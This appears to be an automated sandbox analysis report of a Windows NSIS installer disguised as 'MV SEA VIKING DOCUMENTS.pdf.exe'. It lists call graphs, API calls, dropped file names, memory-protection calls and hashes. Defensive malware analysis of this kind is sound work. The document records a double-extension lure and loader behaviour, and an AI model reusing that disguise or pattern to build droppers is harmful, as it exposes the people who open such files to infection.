8136->8137 8138 405aff GetLastError 8136->8138 8137->8121 8138->8137 8140 406930 GetProcAddress 8139->8140 8141 406926 8139->8141 8144 405b0f 8140->8144 8145 40689a GetSystemDirectoryW 8141->8145 8143 40692c 8143->8140 8143->8144 8144->8121 8146 4068bc wsprintfW LoadLibraryExW 8145->8146 8146->8143 10016 4016cc 10017 402da6 17 API calls 10016->10017 10018 4016d2 GetFullPathNameW 10017->10018 10019 4016ec 10018->10019 10025 40170e 10018->10025 10021 406873 2 API calls 10019->10021 10019->10025 10020 401723 GetShortPathNameW 10022 402c2a 10020->10022 10023 4016fe 10021->10023 10023->10025 10026 40653d lstrcpynW 10023->10026 10025->10020 10025->10022 10026->10025 8488 4020d8 8489 4020ea 8488->8489 8499 40219c 8488->8499 8490 402da6 17 API calls 8489->8490 8492 4020f1 8490->8492 8491 401423 24 API calls 8497 4022f6 8491->8497 8493 402da6 17 API calls 8492->8493 8494 4020fa 8493->8494 8495 402110 LoadLibraryExW 8494->8495 8496 402102 GetModuleHandleW 8494->8496 8498 402121 8495->8498 8495->8499 8496->8495 8496->8498 8511 406979 8498->8511 8499->8491 8502 402132 8504 402151 8502->8504 8505 40213a 8502->8505 8503 40216b 8506 40559f 24 API calls 8503->8506 8516 71491817 8504->8516 8507 401423 24 API calls 8505->8507 8508 402142 8506->8508 8507->8508 8508->8497 8509 40218e FreeLibrary 8508->8509 8509->8497 8558 40655f WideCharToMultiByte 8511->8558 8513 406996 8514 40699d GetProcAddress 8513->8514 8515 40212c 8513->8515 8514->8515 8515->8502 8515->8503 8517 7149184a 8516->8517 8559 71491bff 8517->8559 8519 71491851 8520 71491976 8519->8520 8521 71491869 8519->8521 8522 71491862 8519->8522 8520->8508 8593 71492480 8521->8593 8607 7149243e 8522->8607 8527 714918cd 8533 7149191e 8527->8533 8534 714918d3 8527->8534 8528 714918af 8620 71492655 8528->8620 8529 71491898 8544 7149188e 8529->8544 8617 71492e23 8529->8617 8530 7149187f 8532 71491885 8530->8532 8538 71491890 8530->8538 8532->8544 8603 71492b98 8532->8603 8536 71492655 10 API calls 8533->8536 8639 71491666 8534->8639 
8542 7149190f 8536->8542 8537 714918b5 8631 71491654 8537->8631 8611 71492810 8538->8611 8557 71491965 8542->8557 8645 71492618 8542->8645 8544->8527 8544->8528 8546 71492655 10 API calls 8546->8542 8548 71491896 8548->8544 8550 7149196f GlobalFree 8550->8520 8554 71491951 8554->8557 8649 714915dd wsprintfW 8554->8649 8555 7149194a FreeLibrary 8555->8554 8557->8520 8557->8550 8558->8513 8652 714912bb GlobalAlloc 8559->8652 8561 71491c26 8653 714912bb GlobalAlloc 8561->8653 8563 71491e6b GlobalFree GlobalFree GlobalFree 8564 71491e88 8563->8564 8577 71491ed2 8563->8577 8565 7149227e 8564->8565 8573 71491e9d 8564->8573 8564->8577 8567 714922a0 GetModuleHandleW 8565->8567 8565->8577 8566 71491d26 GlobalAlloc 8586 71491c31 8566->8586 8570 714922b1 LoadLibraryW 8567->8570 8571 714922c6 8567->8571 8568 71491d71 lstrcpyW 8572 71491d7b lstrcpyW 8568->8572 8569 71491d8f GlobalFree 8569->8586 8570->8571 8570->8577 8660 714916bd WideCharToMultiByte GlobalAlloc WideCharToMultiByte GetProcAddress GlobalFree 8571->8660 8572->8586 8573->8577 8656 714912cc 8573->8656 8575 71492318 8575->8577 8579 71492325 lstrlenW 8575->8579 8576 71492126 8659 714912bb GlobalAlloc 8576->8659 8577->8519 8661 714916bd WideCharToMultiByte GlobalAlloc WideCharToMultiByte GetProcAddress GlobalFree 8579->8661 8581 71492067 GlobalFree 8581->8586 8582 714921ae 8582->8577 8589 71492216 lstrcpyW 8582->8589 8583 714922d8 8583->8575 8591 71492302 GetProcAddress 8583->8591 8585 7149233f 8585->8577 8586->8563 8586->8566 8586->8568 8586->8569 8586->8572 8586->8576 8586->8577 8586->8581 8586->8582 8587 714912cc 2 API calls 8586->8587 8588 71491dcd 8586->8588 8587->8586 8588->8586 8654 7149162f GlobalSize GlobalAlloc 8588->8654 8589->8577 8591->8575 8592 7149212f 8592->8519 8600 71492498 8593->8600 8595 714925c1 GlobalFree 8598 7149186f 8595->8598 8595->8600 8596 7149256b GlobalAlloc CLSIDFromString 8596->8595 8597 71492540 GlobalAlloc WideCharToMultiByte 8597->8595 8598->8529 8598->8530 8598->8544 8599 714912cc 
GlobalAlloc lstrcpynW 8599->8600 8600->8595 8600->8596 8600->8597 8600->8599 8602 7149258a 8600->8602 8663 7149135a 8600->8663 8602->8595 8667 714927a4 8602->8667 8606 71492baa 8603->8606 8605 71492d39 8605->8544 8670 71492b42 8606->8670 8608 71492453 8607->8608 8609 7149245e GlobalAlloc 8608->8609 8610 71491868 8608->8610 8609->8608 8610->8521 8615 71492840 8611->8615 8612 714928db GlobalAlloc 8616 714928fe 8612->8616 8613 714928ee 8614 714928f4 GlobalSize 8613->8614 8613->8616 8614->8616 8615->8612 8615->8613 8616->8548 8619 71492e2e 8617->8619 8618 71492e6e GlobalFree 8619->8618 8674 714912bb GlobalAlloc 8620->8674 8622 714926d8 MultiByteToWideChar 8625 7149265f 8622->8625 8623 7149270b lstrcpynW 8623->8625 8624 714926fa StringFromGUID2 8624->8625 8625->8622 8625->8623 8625->8624 8626 7149271e wsprintfW 8625->8626 8627 71492742 GlobalFree 8625->8627 8628 71492777 GlobalFree 8625->8628 8629 71491312 2 API calls 8625->8629 8675 71491381 8625->8675 8626->8625 8627->8625 8628->8537 8629->8625 8679 714912bb GlobalAlloc 8631->8679 8633 71491659 8634 71491666 2 API calls 8633->8634 8635 71491663 8634->8635 8636 71491312 8635->8636 8637 7149131b GlobalAlloc lstrcpynW 8636->8637 8638 71491355 GlobalFree 8636->8638 8637->8638 8638->8542 8640 71491672 wsprintfW 8639->8640 8642 7149169f lstrcpyW 8639->8642 8644 714916b8 8640->8644 8642->8644 8644->8546 8646 71491931 8645->8646 8647 71492626 8645->8647 8646->8554 8646->8555 8647->8646 8648 71492642 GlobalFree 8647->8648 8648->8647 8650 71491312 2 API calls 8649->8650 8651 714915fe 8650->8651 8651->8557 8652->8561 8653->8586 8655 7149164d 8654->8655 8655->8588 8662 714912bb GlobalAlloc 8656->8662 8658 714912db lstrcpynW 8658->8577 8659->8592 8660->8583 8661->8585 8662->8658 8664 71491361 8663->8664 8665 714912cc 2 API calls 8664->8665 8666 7149137f 8665->8666 8666->8600 8668 71492808 8667->8668 8669 714927b2 VirtualAlloc 8667->8669 8668->8602 8669->8668 8671 71492b4d 8670->8671 8672 71492b5d 8671->8672 8673 71492b52 
GetLastError 8671->8673 8672->8605 8673->8672 8674->8625 8676 7149138a 8675->8676 8677 714913ac 8675->8677 8676->8677 8678 71491390 lstrcpyW 8676->8678 8677->8625 8678->8677 8679->8633 8801 401ede 8802 402d84 17 API calls 8801->8802 8803 401ee4 8802->8803 8804 402d84 17 API calls 8803->8804 8805 401ef0 8804->8805 8806 401f07 EnableWindow 8805->8806 8807 401efc ShowWindow 8805->8807 8808 402c2a 8806->8808 8807->8808 8809 4056de 8810 405888 8809->8810 8811 4056ff GetDlgItem GetDlgItem GetDlgItem 8809->8811 8813 405891 GetDlgItem CreateThread CloseHandle 8810->8813 8814 4058b9 8810->8814 8855 4044ce SendMessageW 8811->8855 8813->8814 8858 405672 5 API calls 8813->8858 8816 4058e4 8814->8816 8817 4058d0 ShowWindow ShowWindow 8814->8817 8818 405909 8814->8818 8815 40576f 8821 405776 GetClientRect GetSystemMetrics SendMessageW SendMessageW 8815->8821 8819 4058f0 8816->8819 8820 405944 8816->8820 8857 4044ce SendMessageW 8817->8857 8825 404500 8 API calls 8818->8825 8823 4058f8 8819->8823 8824 40591e ShowWindow 8819->8824 8820->8818 8830 405952 SendMessageW 8820->8830 8828 4057e4 8821->8828 8829 4057c8 SendMessageW SendMessageW 8821->8829 8831 404472 SendMessageW 8823->8831 8826 405930 8824->8826 8827 40593e 8824->8827 8832 405917 8825->8832 8833 40559f 24 API calls 8826->8833 8834 404472 SendMessageW 8827->8834 8835 4057f7 8828->8835 8836 4057e9 SendMessageW 8828->8836 8829->8828 8830->8832 8837 40596b CreatePopupMenu 8830->8837 8831->8818 8833->8827 8834->8820 8839 404499 18 API calls 8835->8839 8836->8835 8838 40657a 17 API calls 8837->8838 8840 40597b AppendMenuW 8838->8840 8841 405807 8839->8841 8842 405998 GetWindowRect 8840->8842 8843 4059ab TrackPopupMenu 8840->8843 8844 405810 ShowWindow 8841->8844 8845 405844 GetDlgItem SendMessageW 8841->8845 8842->8843 8843->8832 8847 4059c6 8843->8847 8848 405833 8844->8848 8849 405826 ShowWindow 8844->8849 8845->8832 8846 40586b SendMessageW SendMessageW 8845->8846 8846->8832 8850 4059e2 SendMessageW 8847->8850 8856 4044ce 
SendMessageW 8848->8856 8849->8848 8850->8850 8852 4059ff OpenClipboard EmptyClipboard GlobalAlloc GlobalLock 8850->8852 8853 405a24 SendMessageW 8852->8853 8853->8853 8854 405a4d GlobalUnlock SetClipboardData CloseClipboard 8853->8854 8854->8832 8855->8815 8856->8845 8857->8816 10359 401ff6 10360 402da6 17 API calls 10359->10360 10361 401ffd 10360->10361 10362 406873 2 API calls 10361->10362 10363 402003 10362->10363 10365 402014 10363->10365 10366 406484 wsprintfW 10363->10366 10366->10365 8148 2451880 EnumWindows 9230 40248a 9231 402da6 17 API calls 9230->9231 9232 40249c 9231->9232 9233 402da6 17 API calls 9232->9233 9234 4024a6 9233->9234 9247 402e36 9234->9247 9237 402c2a 9238 4024de 9239 4024ea 9238->9239 9241 402d84 17 API calls 9238->9241 9242 402509 RegSetValueExW 9239->9242 9244 4032b4 31 API calls 9239->9244 9240 402da6 17 API calls 9243 4024d4 lstrlenW 9240->9243 9241->9239 9245 40251f RegCloseKey 9242->9245 9243->9238 9244->9242 9245->9237 9248 402e51 9247->9248 9251 4063d8 9248->9251 9252 4063e7 9251->9252 9253 4063f2 RegCreateKeyExW 9252->9253 9254 4024b6 9252->9254 9253->9254 9254->9237 9254->9238 9254->9240 8438 245ae8a 8439 245aefc 8438->8439 8440 245b083 CreateFileA 8439->8440 8680 403f9a 8681 403fb2 8680->8681 8682 404113 8680->8682 8681->8682 8683 403fbe 8681->8683 8684 404164 8682->8684 8685 404124 GetDlgItem GetDlgItem 8682->8685 8686 403fc9 SetWindowPos 8683->8686 8687 403fdc 8683->8687 8689 4041be 8684->8689 8700 401389 2 API calls 8684->8700 8688 404499 18 API calls 8685->8688 8686->8687 8691 403fe5 ShowWindow 8687->8691 8692 404027 8687->8692 8693 40414e SetClassLongW 8688->8693 8690 4044e5 SendMessageW 8689->8690 8694 40410e 8689->8694 8721 4041d0 8690->8721 8695 404100 8691->8695 8696 404005 GetWindowLongW 8691->8696 8697 404046 8692->8697 8698 40402f DestroyWindow 8692->8698 8699 40140b 2 API calls 8693->8699 8762 404500 8695->8762 8696->8695 8703 40401e ShowWindow 8696->8703 8704 40404b SetWindowLongW 8697->8704 8705 40405c 
8697->8705 8752 404422 8698->8752 8699->8684 8701 404196 8700->8701 8701->8689 8706 40419a SendMessageW 8701->8706 8703->8692 8704->8694 8705->8695 8709 404068 GetDlgItem 8705->8709 8706->8694 8707 40140b 2 API calls 8707->8721 8708 404424 DestroyWindow EndDialog 8708->8752 8711 404096 8709->8711 8712 404079 SendMessageW IsWindowEnabled 8709->8712 8710 404453 ShowWindow 8710->8694 8714 4040a3 8711->8714 8715 4040ea SendMessageW 8711->8715 8716 4040b6 8711->8716 8726 40409b 8711->8726 8712->8694 8712->8711 8713 40657a 17 API calls 8713->8721 8714->8715 8714->8726 8715->8695 8718 4040d3 8716->8718 8719 4040be 8716->8719 8723 40140b 2 API calls 8718->8723 8722 40140b 2 API calls 8719->8722 8720 4040d1 8720->8695 8721->8694 8721->8707 8721->8708 8721->8713 8724 404499 18 API calls 8721->8724 8743 404364 DestroyWindow 8721->8743 8753 404499 8721->8753 8722->8726 8725 4040da 8723->8725 8724->8721 8725->8695 8725->8726 8759 404472 8726->8759 8728 40424b GetDlgItem 8729 404260 8728->8729 8730 404268 ShowWindow KiUserCallbackDispatcher 8728->8730 8729->8730 8756 4044bb KiUserCallbackDispatcher 8730->8756 8732 404292 EnableWindow 8737 4042a6 8732->8737 8733 4042ab GetSystemMenu EnableMenuItem SendMessageW 8734 4042db SendMessageW 8733->8734 8733->8737 8734->8737 8736 403f7b 18 API calls 8736->8737 8737->8733 8737->8736 8757 4044ce SendMessageW 8737->8757 8758 40653d lstrcpynW 8737->8758 8739 40430a lstrlenW 8740 40657a 17 API calls 8739->8740 8741 404320 SetWindowTextW 8740->8741 8742 401389 2 API calls 8741->8742 8742->8721 8744 40437e CreateDialogParamW 8743->8744 8743->8752 8745 4043b1 8744->8745 8744->8752 8746 404499 18 API calls 8745->8746 8747 4043bc GetDlgItem GetWindowRect ScreenToClient SetWindowPos 8746->8747 8748 401389 2 API calls 8747->8748 8749 404402 8748->8749 8749->8694 8750 40440a ShowWindow 8749->8750 8751 4044e5 SendMessageW 8750->8751 8751->8752 8752->8694 8752->8710 8754 40657a 17 API calls 8753->8754 8755 4044a4 SetDlgItemTextW 8754->8755 8755->8728 
8756->8732 8757->8737 8758->8739 8760 404479 8759->8760 8761 40447f SendMessageW 8759->8761 8760->8761 8761->8720 8763 4045c3 8762->8763 8764 404518 GetWindowLongW 8762->8764 8763->8694 8764->8763 8765 40452d 8764->8765 8765->8763 8766 40455a GetSysColor 8765->8766 8767 40455d 8765->8767 8766->8767 8768 404563 SetTextColor 8767->8768 8769 40456d SetBkMode 8767->8769 8768->8769 8770 404585 GetSysColor 8769->8770 8771 40458b 8769->8771 8770->8771 8772 404592 SetBkColor 8771->8772 8773 40459c 8771->8773 8772->8773 8773->8763 8774 4045b6 CreateBrushIndirect 8773->8774 8775 4045af DeleteObject 8773->8775 8774->8763 8775->8774 8782 40259e 8793 402de6 8782->8793 8786 4025b1 8787 4025d9 RegEnumValueW 8786->8787 8788 4025cd RegEnumKeyW 8786->8788 8789 40292e 8786->8789 8790 4025f5 RegCloseKey 8787->8790 8791 4025ee 8787->8791 8788->8790 8790->8789 8791->8790 8794 402da6 17 API calls 8793->8794 8795 402dfd 8794->8795 8796 4063aa RegOpenKeyExW 8795->8796 8797 4025a8 8796->8797 8798 402d84 8797->8798 8799 40657a 17 API calls 8798->8799 8800 402d99 8799->8800 8800->8786

Control-flow Graph

[Figure: control-flow graph of the function at 40352d; legend: Executed / Not Executed]
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                • SetErrorMode.KERNELBASE(00008001), ref: 00403550
                                                                                                                                                                                                                                • GetVersionExW.KERNEL32(?), ref: 00403579
                                                                                                                                                                                                                                • GetVersionExW.KERNEL32(0000011C), ref: 00403590
                                                                                                                                                                                                                                • lstrlenA.KERNEL32(UXTHEME,UXTHEME), ref: 00403627
                                                                                                                                                                                                                                • #17.COMCTL32(00000007,00000009,0000000B), ref: 00403663
                                                                                                                                                                                                                                • OleInitialize.OLE32(00000000), ref: 0040366A
                                                                                                                                                                                                                                • SHGetFileInfoW.SHELL32(0042B228,00000000,?,000002B4,00000000), ref: 00403688
                                                                                                                                                                                                                                • GetCommandLineW.KERNEL32(00433F00,NSIS Error), ref: 0040369D
                                                                                                                                                                                                                                • CharNextW.USER32(00000000,"C:\Users\user\Desktop\MV SEA VIKING DOCUMENTS.pdf.exe" ,00000020,"C:\Users\user\Desktop\MV SEA VIKING DOCUMENTS.pdf.exe" ,00000000), ref: 004036D6
                                                                                                                                                                                                                                • GetTempPathW.KERNEL32(00000400,C:\Users\user\AppData\Local\Temp\,00000000,?), ref: 00403809
                                                                                                                                                                                                                                • GetWindowsDirectoryW.KERNEL32(C:\Users\user\AppData\Local\Temp\,000003FB), ref: 0040381A
                                                                                                                                                                                                                                • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,\Temp), ref: 00403826
                                                                                                                                                                                                                                • GetTempPathW.KERNEL32(000003FC,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,\Temp), ref: 0040383A
                                                                                                                                                                                                                                • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,Low), ref: 00403842
                                                                                                                                                                                                                                • SetEnvironmentVariableW.KERNEL32(TEMP,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,Low), ref: 00403853
                                                                                                                                                                                                                                • SetEnvironmentVariableW.KERNEL32(TMP,C:\Users\user\AppData\Local\Temp\), ref: 0040385B
                                                                                                                                                                                                                                • DeleteFileW.KERNELBASE(1033), ref: 0040386F
                                                                                                                                                                                                                                • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,~nsu), ref: 00403956
                                                                                                                                                                                                                                • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,0040A26C), ref: 00403965
                                                                                                                                                                                                                                  • Part of subcall function 00405AEB: CreateDirectoryW.KERNELBASE(?,00000000,00403520,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403810), ref: 00405AF1
                                                                                                                                                                                                                                • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,.tmp), ref: 00403970
                                                                                                                                                                                                                                • lstrcmpiW.KERNEL32(C:\Users\user\AppData\Local\Temp\,C:\Users\user\Desktop,C:\Users\user\AppData\Local\Temp\,.tmp,C:\Users\user\AppData\Local\Temp\,~nsu,"C:\Users\user\Desktop\MV SEA VIKING DOCUMENTS.pdf.exe" ,00000000,?), ref: 0040397C
                                                                                                                                                                                                                                • SetCurrentDirectoryW.KERNEL32(C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\), ref: 0040399C
                                                                                                                                                                                                                                • DeleteFileW.KERNEL32(0042AA28,0042AA28,?,00436000,?), ref: 004039FB
                                                                                                                                                                                                                                • CopyFileW.KERNEL32(C:\Users\user\Desktop\MV SEA VIKING DOCUMENTS.pdf.exe,0042AA28,00000001), ref: 00403A0E
                                                                                                                                                                                                                                • CloseHandle.KERNEL32(00000000,0042AA28,0042AA28,?,0042AA28,00000000), ref: 00403A3B
                                                                                                                                                                                                                                • OleUninitialize.OLE32(?), ref: 00403A5E
                                                                                                                                                                                                                                • ExitProcess.KERNEL32 ref: 00403A78
                                                                                                                                                                                                                                • GetCurrentProcess.KERNEL32(00000028,?), ref: 00403A8C
                                                                                                                                                                                                                                • OpenProcessToken.ADVAPI32(00000000), ref: 00403A93
                                                                                                                                                                                                                                • LookupPrivilegeValueW.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 00403AA7
                                                                                                                                                                                                                                • AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000), ref: 00403AC6
                                                                                                                                                                                                                                • ExitWindowsEx.USER32(00000002,80040002), ref: 00403AEB
                                                                                                                                                                                                                                • ExitProcess.KERNEL32 ref: 00403B0C
                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000000.00000002.2300564925.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_MV SEA VIKING DOCUMENTS.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: lstrcat$FileProcess$DirectoryExit$CurrentDeleteEnvironmentPathTempTokenVariableVersionWindows$AdjustCharCloseCommandCopyCreateErrorHandleInfoInitializeLineLookupModeNextOpenPrivilegePrivilegesUninitializeValuelstrcmpilstrlen
                                                                                                                                                                                                                                • String ID: "C:\Users\user\Desktop\MV SEA VIKING DOCUMENTS.pdf.exe" $.tmp$1033$C:\Users\user\AppData\Local\Temp$C:\Users\user\AppData\Local\Temp$C:\Users\user\AppData\Local\Temp\$C:\Users\user\AppData\Local\Temp\Stuffiness7.dat$C:\Users\user\Desktop$C:\Users\user\Desktop\MV SEA VIKING DOCUMENTS.pdf.exe$Error launching installer$Low$NSIS Error$SeShutdownPrivilege$TEMP$TMP$UXTHEME$\Temp$~nsu
                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                • GetDlgItem.USER32(?,00000403), ref: 0040573C
                                                                                                                                                                                                                                • GetDlgItem.USER32(?,000003EE), ref: 0040574B
                                                                                                                                                                                                                                • GetClientRect.USER32(?,?), ref: 00405788
                                                                                                                                                                                                                                • GetSystemMetrics.USER32(00000002), ref: 0040578F
                                                                                                                                                                                                                                • SendMessageW.USER32(?,00001061,00000000,?), ref: 004057B0
                                                                                                                                                                                                                                • SendMessageW.USER32(?,00001036,00004000,00004000), ref: 004057C1
                                                                                                                                                                                                                                • SendMessageW.USER32(?,00001001,00000000,00000110), ref: 004057D4
                                                                                                                                                                                                                                • SendMessageW.USER32(?,00001026,00000000,00000110), ref: 004057E2
                                                                                                                                                                                                                                • SendMessageW.USER32(?,00001024,00000000,?), ref: 004057F5
                                                                                                                                                                                                                                • ShowWindow.USER32(00000000,?,0000001B,000000FF), ref: 00405817
                                                                                                                                                                                                                                • ShowWindow.USER32(?,00000008), ref: 0040582B
                                                                                                                                                                                                                                • GetDlgItem.USER32(?,000003EC), ref: 0040584C
                                                                                                                                                                                                                                • SendMessageW.USER32(00000000,00000401,00000000,75300000), ref: 0040585C
                                                                                                                                                                                                                                • SendMessageW.USER32(00000000,00000409,00000000,?), ref: 00405875
                                                                                                                                                                                                                                • SendMessageW.USER32(00000000,00002001,00000000,00000110), ref: 00405881
                                                                                                                                                                                                                                • GetDlgItem.USER32(?,000003F8), ref: 0040575A
                                                                                                                                                                                                                                  • Part of subcall function 004044CE: SendMessageW.USER32(00000028,?,00000001,004042F9), ref: 004044DC
                                                                                                                                                                                                                                • GetDlgItem.USER32(?,000003EC), ref: 0040589E
                                                                                                                                                                                                                                • CreateThread.KERNEL32(00000000,00000000,Function_00005672,00000000), ref: 004058AC
                                                                                                                                                                                                                                • CloseHandle.KERNELBASE(00000000), ref: 004058B3
                                                                                                                                                                                                                                • ShowWindow.USER32(00000000), ref: 004058D7
                                                                                                                                                                                                                                • ShowWindow.USER32(?,00000008), ref: 004058DC
                                                                                                                                                                                                                                • ShowWindow.USER32(00000008), ref: 00405926
                                                                                                                                                                                                                                • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 0040595A
                                                                                                                                                                                                                                • CreatePopupMenu.USER32 ref: 0040596B
                                                                                                                                                                                                                                • AppendMenuW.USER32(00000000,00000000,00000001,00000000), ref: 0040597F
                                                                                                                                                                                                                                • GetWindowRect.USER32(?,?), ref: 0040599F
                                                                                                                                                                                                                                • TrackPopupMenu.USER32(00000000,00000180,?,?,00000000,?,00000000), ref: 004059B8
                                                                                                                                                                                                                                • SendMessageW.USER32(?,00001073,00000000,?), ref: 004059F0
                                                                                                                                                                                                                                • OpenClipboard.USER32(00000000), ref: 00405A00
                                                                                                                                                                                                                                • EmptyClipboard.USER32 ref: 00405A06
                                                                                                                                                                                                                                • GlobalAlloc.KERNEL32(00000042,00000000), ref: 00405A12
                                                                                                                                                                                                                                • GlobalLock.KERNEL32(00000000), ref: 00405A1C
                                                                                                                                                                                                                                • SendMessageW.USER32(?,00001073,00000000,?), ref: 00405A30
                                                                                                                                                                                                                                • GlobalUnlock.KERNEL32(00000000), ref: 00405A50
                                                                                                                                                                                                                                • SetClipboardData.USER32(0000000D,00000000), ref: 00405A5B
                                                                                                                                                                                                                                • CloseClipboard.USER32 ref: 00405A61
                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000000.00000002.2300564925.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_MV SEA VIKING DOCUMENTS.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: MessageSend$Window$ItemShow$Clipboard$GlobalMenu$CloseCreatePopupRect$AllocAppendClientDataEmptyHandleLockMetricsOpenSystemThreadTrackUnlock
                                                                                                                                                                                                                                • String ID: {
                                                                                                                                                                                                                                • API String ID: 590372296-366298937
                                                                                                                                                                                                                                • Opcode ID: efbbf4d88f7660e4c87201c03f03245d3270aa31951a4a241d93bb0c475bbbe6
                                                                                                                                                                                                                                • Instruction ID: 6b97441d6f4cfe62a880681573964a63c423f2dd70b2063085686802d9cc5617
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: efbbf4d88f7660e4c87201c03f03245d3270aa31951a4a241d93bb0c475bbbe6
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: C8B169B1900608FFDB119FA0DD85AAE7B79FB44355F00803AFA41BA1A0C7755E51DF58
                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                                • Executed
                                                                                                                                                                                                                                • Not Executed
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                • DeleteFileW.KERNELBASE(?,?,76F73420,C:\Users\user\AppData\Local\Temp\,00000000), ref: 00405C72
                                                                                                                                                                                                                                • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\Stuffiness7.dat,\*.*), ref: 00405CBA
                                                                                                                                                                                                                                • lstrcatW.KERNEL32(?,0040A014), ref: 00405CDD
                                                                                                                                                                                                                                • lstrlenW.KERNEL32(?,?,0040A014,?,C:\Users\user\AppData\Local\Temp\Stuffiness7.dat,?,?,76F73420,C:\Users\user\AppData\Local\Temp\,00000000), ref: 00405CE3
                                                                                                                                                                                                                                • FindFirstFileW.KERNELBASE(C:\Users\user\AppData\Local\Temp\Stuffiness7.dat,?,?,?,0040A014,?,C:\Users\user\AppData\Local\Temp\Stuffiness7.dat,?,?,76F73420,C:\Users\user\AppData\Local\Temp\,00000000), ref: 00405CF3
                                                                                                                                                                                                                                • FindNextFileW.KERNEL32(00000000,00000010,000000F2,?,?,?,?,0000002E), ref: 00405D93
                                                                                                                                                                                                                                • FindClose.KERNEL32(00000000), ref: 00405DA2
                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000000.00000002.2300564925.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_MV SEA VIKING DOCUMENTS.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: FileFind$lstrcat$CloseDeleteFirstNextlstrlen
                                                                                                                                                                                                                                • String ID: .$.$C:\Users\user\AppData\Local\Temp\$C:\Users\user\AppData\Local\Temp\Stuffiness7.dat$\*.*
                                                                                                                                                                                                                                • API String ID: 2035342205-3920725043
                                                                                                                                                                                                                                • Opcode ID: 91e5555b9508150fcf6e55f7c9d4dc2ae8152fc7335161658e002f7252bbf59f
                                                                                                                                                                                                                                • Instruction ID: 8b2ee76931e9ba666d6dc67a471f1b560bbb00ea1adf29c264b32972d7114dcf
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 91e5555b9508150fcf6e55f7c9d4dc2ae8152fc7335161658e002f7252bbf59f
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 3D41A130900A14BADB216B65CC8DABF7678DF81714F14817FF841B21D1D77C4A819EAE
                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                                • Executed
                                                                                                                                                                                                                                • Not Executed
                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000000.00000002.2304287557.0000000002450000.00000040.00000001.00040000.00000008.sdmp, Offset: 02450000, based on PE: false
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_2450000_MV SEA VIKING DOCUMENTS.jbxd
                                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: LibraryLoadMemoryProtectVirtual
                                                                                                                                                                                                                                • String ID: ?~6$`\5z$dX.F$C
                                                                                                                                                                                                                                • API String ID: 3389902171-2019787811
                                                                                                                                                                                                                                • Opcode ID: e75703e78556f527a026b136a5bdc93621ca6d0395fcdbb7fc45e3bf14493fb5
                                                                                                                                                                                                                                • Instruction ID: 477353243d3fdcc716c95d50bd20222e1365fd23ac77013417fcadf72d3e0094
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: e75703e78556f527a026b136a5bdc93621ca6d0395fcdbb7fc45e3bf14493fb5
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 38D21571604386CFDF359E38CD987EA7BA2AF56350F45822ECCD98B295D3308586CB52
                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                                • Executed
                                                                                                                                                                                                                                • Not Executed
                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000000.00000002.2304287557.0000000002450000.00000040.00000001.00040000.00000008.sdmp, Offset: 02450000, based on PE: false
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
